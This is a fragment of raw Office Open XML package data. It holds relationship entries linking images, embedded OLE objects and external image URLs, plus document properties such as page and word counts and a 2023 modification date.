Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.emf"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject6.bin"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.jpeg"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.jpeg"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject5.bin"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.jpeg"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.jpeg"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.jpeg"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.jpeg"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.emf"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject4.bin"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.jpeg"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.emf"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject3.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.emf"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.emf"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpeg"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.jpeg"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpeg"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.jpeg"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpeg"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpeg"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpeg"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.jpeg"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpeg"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.jpeg"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106165421167.png" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106165440154.png" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230109150739909.png" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164831182.png" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164743194.png" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164711413.png" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164633833.png" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164520715.png" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164421580.png" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230109150418307.png" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106170933578.png" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164245476.png" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164202327.png" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164026340.png" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106163836193.png" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106163458203.png" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106163411454.png" TargetMode="Externa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118</Pages>
  <Words>12828</Words>
  <Characters>28891</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>32561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宋佳兴</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-30T10:30:23Z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2A448A534420464EB482FE7C8FF16D06_12</vt:lpwstr>
  </property>
</Properties>
</file>